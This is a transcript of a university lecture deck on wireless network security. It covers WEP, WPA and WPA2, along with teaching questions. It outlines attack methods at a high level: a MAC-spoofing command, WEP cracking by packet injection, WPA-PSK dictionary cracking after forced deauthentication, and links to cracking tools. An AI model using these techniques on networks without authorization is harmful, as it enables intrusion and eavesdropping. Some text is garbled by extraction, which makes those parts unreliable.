5169 wireless network security aminek
TRANSCRIPT
-
7/29/2019 5169 Wireless Network Security AmineK
1/47
Wireless Networks and Mobile Computing (CSI 5169)
Wireless Network Security
Amine Khalife
-
7/29/2019 5169 Wireless Network Security AmineK
2/47
Outline
1. Wireless intro & history
2. Wireless network modes
3. SSID
4. WEP
5. WPA
6. WPA2
7. Wireless Network tools
8. References
Wireless Network Security
-
7/29/2019 5169 Wireless Network Security AmineK
3/47
Background & Overview History
Developed for military use Security widely noticed after Peter Shipleys 2001 DefConpreso on War Driving
DHS labeled Wi-Fi a terrorist threat, demanded regulation Non Wi-Fi types
CDPD 19.2 kbps analog GPRS 171.2 kbps digital WAP bandwidth-efficient content delivery Ricochet 176 kbps wireless broadband flop Bluetooth personal area networks, range limited only by
transmit power Blackberry Use cellular & PCS networks, no
authentication at console
IEEE 802 series standards 802.11 wireless LANs 802.15 wireless personal area networks (e.g., Bluetooth) 802.16 wireless broadband up to 155Mb, wireless ISPs
Wireless Network Security
-
7/29/2019 5169 Wireless Network Security AmineK
4/47
802.11 Standards
802.11a 54 Mbps@5 GHz Not interoperable with 802.11b Limited distance Dual-mode APs require 2 chipsets, look like two APs to
clients Cisco products: Aironet 1200
802.11b 11 [email protected] GHz Full speed up to 300 feet Coverage up to 1750 feet Cisco products: Aironet 340, 350, 1100, 1200
802.11g 54 [email protected] GHz Same range as 802.11b
Backward-compatible with 802.11b Speeds slower in dual-mode Cisco products: Aironet 1100, 1200
Wireless Network Security
-
7/29/2019 5169 Wireless Network Security AmineK
5/47
802.11 Standards (Cont.)
802.11e QoS Dubbed Wireless MultiMedia (WMM) by Wi-Fi Alliance
802.11i Security Adds AES encryption Requires high cpu, new chips required TKIP is interim solution
802.11n (2009) up to 300Mbps 5Ghz and/or 2.4Ghz ~230ft range
802.11ac (under development) Will provide high through put in the 5 GHz band
Will use wider RF bandwidth will enable multi-station WLAN throughput of at least 1
Gbps a maximum single link throughput of at least 500 Mbps
Wireless Network Security
-
7/29/2019 5169 Wireless Network Security AmineK
6/47
Wireless Network Modes
The 802.11 wireless networks operate in two basicmodes:
1. Infrastructure mode
2. Ad-hocmode
Infrastructure mode:
each wireless client connects directly to a centraldevice called Access Point (AP)
no direct connection between wireless clients
AP acts as a wireless hub that performs theconnections and handles them between wirelessclients
Wireless Network Security
-
7/29/2019 5169 Wireless Network Security AmineK
7/47
Wireless Network Modes (contd)
The hub handles:
the clients authentication,
Authorization
link-level data security (access control and
enabling data traffic encryption) Ad-hoc mode:
Each wireless client connects directly with each other
No central device managing the connections
Rapid deployment of a temporal network where no
infrastructures exist (advantage in case of disaster)
Each node must maintain its proper authenticationlist
Wireless Network Security
-
7/29/2019 5169 Wireless Network Security AmineK
8/47
SSID Service Set Identification
Identifies a particular wireless network
A client must set the same SSID as the one in thatparticular AP Point to join the network
Without SSID, the client wont be able to select and joina wireless network
Hiding SSID is not a security measure because thewireless network in this case is not invisible
It can be defeated by intruders by sniffing it from anyprobe signal containing it.
Wireless Network Security
-
7/29/2019 5169 Wireless Network Security AmineK
9/47
SSID (Contd)
A way for vendors to make more money
So easy to find the ID for a hidden network becausethe beacon broadcasting cannot be turned off
Simply use a utility to show all the current networks:
inSSIDer
NetStumbler
Kismet
Wireless Network Security
-
7/29/2019 5169 Wireless Network Security AmineK
10/47
IEEE 802.11 Security Access control list
Access control list
Simplest security measure
Filtering out unknown users
Requires a list of authorized clients MAC addresses to
be loaded in the AP Wont protect each wireless client nor the traffic
confidentiality and integrity ===>vulnerable
Defeated by MAC spoofing:
ifconfig eth0 hw ether00:01:02:03:04:05 (Linux)
SMAC - KLC Consulting (Windows)
MAC Makeup - H&C Works (Windows)
Wireless Network Security
-
7/29/2019 5169 Wireless Network Security AmineK
11/47
WEP - Wired Equivalent Privacy
The original native security mechanism for WLAN
provide security through a 802.11 network
Used to protect wireless communication from eavesdropping(confidentiality)
Prevent unauthorized access to a wireless network (accesscontrol)
Prevent tampering with transmitted messages
Provide users with the equivalent level of privacy inbuilt inwireless networks.
Wireless Network Security
-
7/29/2019 5169 Wireless Network Security AmineK
12/47
WEP
1. Appends a 32-bit CRC checksum to each outgoing frame(INTEGRITY)
2. Encrypts the frame using RC4 stream cipher = 40-bit
(standard) or 104-bit (Enhanced) message keys + a 24-bit IVrandom initialization vector (CONFIDENTIALITY).
3. The Initialization Vector (IV) and default key on the stationaccess point are used to create a key stream
4. The key stream is then used to convert the plain text messageinto the WEP encrypted frame.
Wireless Network Security
-
7/29/2019 5169 Wireless Network Security AmineK
13/47
Encrypted WEP frame
Wireless Network Security
-
7/29/2019 5169 Wireless Network Security AmineK
14/47
RC4 keystream XORed with plaintext
Wireless Network Security
-
7/29/2019 5169 Wireless Network Security AmineK
15/47
WEP Components
Initialization Vector IV Dynamic 24-bit value Chosen randomly by the transmitter wireless network
interface 16.7 million possible keys (224)
Shared Secret Key 40 bits long (5 ASCII characters) when 64 bit key is used 104 bits long (13 ASCII characters) when 128 bit key is used
Wireless Network Security
-
7/29/2019 5169 Wireless Network Security AmineK
16/47
WEP Components (contd)
RC4 algorithm consists of 2 main parts:
1. The Key Scheduling Algorithm (KSA):
involves creating a scrambled state arrayThis state array will now be used as input in the
second phase, called the PRGA phase.
2. The Pseudo Random Generation Algorithm(PRGA): The state array from the KSA process is used here to
generate a final key stream. Each byte of the key stream generated is then Xored
with the corresponding plain text byte to produce thedesired cipher text.
Wireless Network Security
-
7/29/2019 5169 Wireless Network Security AmineK
17/47
WEP Components (contd)
ICV (Integrity Check Value)= CRC32 (cyclic redundancycheck) integrity check
XOR operation denoted as
plain-text keystream= cipher-text
cipher-text keystream= plain-text
plain-text cipher-text= keystream
Wireless Network Security
-
7/29/2019 5169 Wireless Network Security AmineK
18/47
How WEP works
Wireless Network Security
IV
RC4key
IV encrypted packet
original unencrypted packet checksum
-
7/29/2019 5169 Wireless Network Security AmineK
19/47
Encryption Process
Wireless Network Security
-
7/29/2019 5169 Wireless Network Security AmineK
20/47
Decryption Process
Wireless Network Security
-
7/29/2019 5169 Wireless Network Security AmineK
21/47
WEP Authentication
1. The station sends an authentication request to AP
2. AP sends challenge text to the station.
3. The station uses its configured 64-bit or 128-bit default key toencrypt the challenge text, and it sends the latter to AP.
4. AP decrypts the encrypted text using its configured WEP key
that corresponds to the station's default key.5. AP compares the decrypted text with the original challenge
text.
6. If the decrypted text matches the original challenge text, thenthe access point and the station share the same WEP key, and
the access point authenticates the station.7. The station connects to the network.
Wireless Network Security
-
7/29/2019 5169 Wireless Network Security AmineK
22/47
WEP Authentication (Contd)
Wireless Network Security
-
7/29/2019 5169 Wireless Network Security AmineK
23/47
WEP Authentication (Contd)
There is a well-documented vulnerability with shared-key authentication.
The authentication process leaks information aboutthe key stream
It is possible to derive the keystream used for the handshake by
capturing the challenge frames in Shared Key authentication. SKA is regarded as insecure.
The problem is that a monitoring attacker can observe both thechallenge and the encrypted response.
he can determine the RC4 stream used to encrypt the
response,He can use that stream to encrypt any challenge he
receives in the future
Wireless Network Security
-
7/29/2019 5169 Wireless Network Security AmineK
24/47
WEP flaws and vulnerabilities
Weak keys:
It allows an attacker to discover the default keybeing used by the Access Point and client stations
This enables an attacker to decrypt all messagesbeing sent over the encrypted channel.
IV reuse and small size:
There are 224 different IVs
On a busy network, the IV will surely be reused, ifthe default key has not been changed and the
original message can be retrieved relatively easily.
Wireless Network Security
-
7/29/2019 5169 Wireless Network Security AmineK
25/47
WEP flaws and vulnerabilities (contd)
With IV reuse, it is possible to determine keystreamsand hence enable an attacker to forge packetsobtaining access to the WLAN.
If WEP is using 40 bit long key then it will need moreprotection from attacks as compared to 128 bit long
WEP key. Hence, both are very weak and unable toprovide the security to Wi-Fi Networks.
uses weak authentication algorithm
uses weak data encapsulation method
The use of improper integrity algorithm i.e. CRC-32
Lack of mutual authentication and key management
Wireless Network Security
-
7/29/2019 5169 Wireless Network Security AmineK
26/47
Attacks on WEP
Wireless Network Security
WEP encrypted networks can be cracked in 10 minutes
Goal is to collect enough IVs to be able to crack the key
IV = Initialization Vector, plaintext appended to the key toavoid Repetition
Injecting packets generates IVs
-
7/29/2019 5169 Wireless Network Security AmineK
27/47
Attacks on WEP
Backtrack 5 (Released 1st March 2012)
Tutorial is available
All required tools on a Linux
bootable CD + laptop +
wireless card
Wireless Network Security
-
7/29/2019 5169 Wireless Network Security AmineK
28/47
WEP cracking example
Wireless Network Security
-
7/29/2019 5169 Wireless Network Security AmineK
29/47
WPA - WI-FI Protected Access
New technique in 2002
replacement of security flaws of WEP.
Improved data encryption
Strong user authentication
Because of many attacks related to static key, WPAminimize shared secret key in accordance with theframe transmission.
Use the RC4 algorithm in a proper way and provide fasttransfer of the data before someone can decrypt the
data.
Wireless Network Security
-
7/29/2019 5169 Wireless Network Security AmineK
30/47
WPA
Data is encrypted using the RC4 stream cipher, with a128-bit key and a 48-bit initialization vector (IV).
One major improvement in WPA over WEP is theTemporal Key Integrity Protocol (TKIP), whichdynamically changes keys as the system is used.
When combined with the much larger IV, this defeatsthe well-known key recovery attacks on WEP.
WPA also provides vastly improved payload integrity.
Wireless Network Security
-
7/29/2019 5169 Wireless Network Security AmineK
31/47
WPA
A more secure message authentication code (usuallyknown as a MAC, but here termed a MIC for "MessageIntegrity Code") is used in WPA, an algorithm named"Michael".
The MIC used in WPA includes a frame counter, which
prevents replay attacks being executed.
The Michael algorithm is a strong algorithm that wouldstill work with most older network cards.
WPA includes a special countermeasure mechanism thatdetects an attempt to break TKIP and temporarily
blocks communications with the attacker.
Wireless Network Security
-
7/29/2019 5169 Wireless Network Security AmineK
32/47
WPA
Wireless Network Security
-
7/29/2019 5169 Wireless Network Security AmineK
33/47
How WPA Addresses the WEP Vulnerabilities
WPA wraps RC4 cipher engine in four new algorithms1. Extended 48-bit IV and IV Sequencing Rules
248 is a large number! More than 500 trillion
Sequencing rules specify how IVs are selected andverified
2. A Message Integrity Code (MIC) called MichaelDesigned for deployed hardware
Requires use of active countermeasures
3. Key Derivation and Distribution
Initial random number exchanges defeat man-in-the-middle attacks
4. Temporal Key Integrity Protocol generates per-packet keys
Wireless Network Security
-
7/29/2019 5169 Wireless Network Security AmineK
34/47
WPA2 - WI-FI Protected Access 2
Based on the IEEE 802.i standard
2 versions: Personal & Enterprise
The primary enhancement over WPA is the use of theAES (Advanced Encryption Standard) algorithm
The encryption in WPA2 is done by utilizing eitherAES or TKIP
The Personal mode uses a PSK (Pre-shared key) &does not require a separate authentication of users
The enterprise mode requires the users to be
separately authenticated by using the EAP protocol
Wireless Network Security
-
7/29/2019 5169 Wireless Network Security AmineK
35/47
WPA2
WPA uses AES with a key length of 128 bit to encryptthe data
The AES uses the Counter-Mode/CBC-MAC Protocol(CCMP)
The CCMP uses the same key for both encryption andauthentication, but with different initialization vectors.
Wireless Network Security
-
7/29/2019 5169 Wireless Network Security AmineK
36/47
WPA2
WPA2 has immunity against many types of hackerattacks
Man-in-the middle
Authentication forging
Replay
Key collision
Weak keys
Packet forging
Dictionary attacks
Wireless Network Security
-
7/29/2019 5169 Wireless Network Security AmineK
37/47
WPA2 weaknesses
Cant protect against layer session hijacking
Cant stand in front of the physical layer attacks:
RF jamming Data flooding
Access points failure
Vulnerable to the Mac addresses spoofing
Wireless Network Security
-
7/29/2019 5169 Wireless Network Security AmineK
38/47
Am I secure if I use WPA-PSK
WPA-PSK protected networks are vulnerable to dictionaryattacks
Works with WPA & WPA2 (802.11i)
New attack techniques have increased the speed of this attackCowPatty 4.6
Run CowPatty against packets to crack the key
Needs SSID to crack the WPA-PSK, easily obtainable!
Also supports WPA2-PSK cracking with the same pre-computed tables!
Spoof the Mac address of the AP and tell client to disassociate Sniff the wireless network for the WPA-PSK handshake (EAPOL)
Wireless Network Security
-
7/29/2019 5169 Wireless Network Security AmineK
39/47
WPA Cracking Example
Wireless Network Security
-
7/29/2019 5169 Wireless Network Security AmineK
40/47
WEP vs WPA vs WPA2
Wireless Network Security
WEP WPA WPA2ENCRYPTION RC4 RC4 AES
KEY ROTATION NONE DynamicSession Keys Dynamic SessionKeys
KEY
DISTRIBUTIONManually typed
into each deviceAutomatic
distribution
availableAutomatic
distribution
availableAUTHENTICATION Uses WEP key as
AuthenticationCan use 802.1x
& EAPCan use 802.1x
& EAP
-
7/29/2019 5169 Wireless Network Security AmineK
41/47
Procedures to improve wireless security
Use wireless intrusion prevention system (WIPS)
Enable WPA-PSK
Use a good passphrase (https://grc.com/password)
Use WPA2 where possible
AES is more secure, use TKIP for better performance
Change your SSID every so often
Wireless network users should use or upgrade theirnetwork to the latest security standard released
Wireless Network Security
-
7/29/2019 5169 Wireless Network Security AmineK
42/47
Wireless Network tools
MAC Spoofing http://aspoof.sourceforge.net/
http://www.gorlani.com/publicprj/macmakeup/macmakeup.asp
http://www.klcconsulting.net/smac/
WEP Cracking tools
http://www.backtrack-linux.org/ http://www.remote-exploit.org/articles/backtrack/index.html
http://wepattack.sourceforge.net/
http://wepcrack.sourceforge.net/
Wireless Analysers
http://www.kismetwireless.net/
http://www.netstumbler.com/
Wireless Network Security
-
7/29/2019 5169 Wireless Network Security AmineK
43/47
Questions
Q1) Given the cipher-text: 11010110 and the plaintext: 00110101.Compute the keystream.
A1) cipher-text: 1 1 0 1 0 1 1 0
plain-text: 0 0 1 1 0 1 0 1
keystream: 1 1 1 0 0 0 1 1
Encrypting: plain-text keystream = cipher-text
Decrypting: cipher-text keystream = plain-text
Wireless Network Security
-
7/29/2019 5169 Wireless Network Security AmineK
44/47
Questions (Contd)
Q2) Why SSID hiding or disabling technique is not an100% effective?
A2) The beacon broadcasting cannot be turned off andhackers can still detect the SSID by sniffing differentmessages using hacking tools.
Wireless Network Security
-
7/29/2019 5169 Wireless Network Security AmineK
45/47
Questions(Contd)
Q3) List 4 WEP vulnerabilities
A3)
1. The Initialization Vector (IV) is Too Small
2. The Integrity Check Value (ICV) algorithm is notappropriate
3. WEPs use of RC4 is weak
4. Authentication Messages can be easily forged
Wireless Network Security
-
7/29/2019 5169 Wireless Network Security AmineK
46/47
REFERENCES
1. Hytnen, R., and Garcia, M.An Analysis of Wireless Security.2006
2. Whalen, S.Analysis of WEP and RC4 Algorithms. March 2002
3. http://en.wikipedia.org/wiki/IEEE_802.1X
4. Wireless LAN Medium Access Control and Physical LayerSpecifications. IEEE Std 802.11. June 2007
5. http://en.wikipedia.org/wiki/Wired_Equivalent_Privacy
6. http://en.wikipedia.org/wiki/Advanced_Encryption_Standard
Wireless Network Security
-
7/29/2019 5169 Wireless Network Security AmineK
47/47
Thank You!Questions?
Wireless Network Security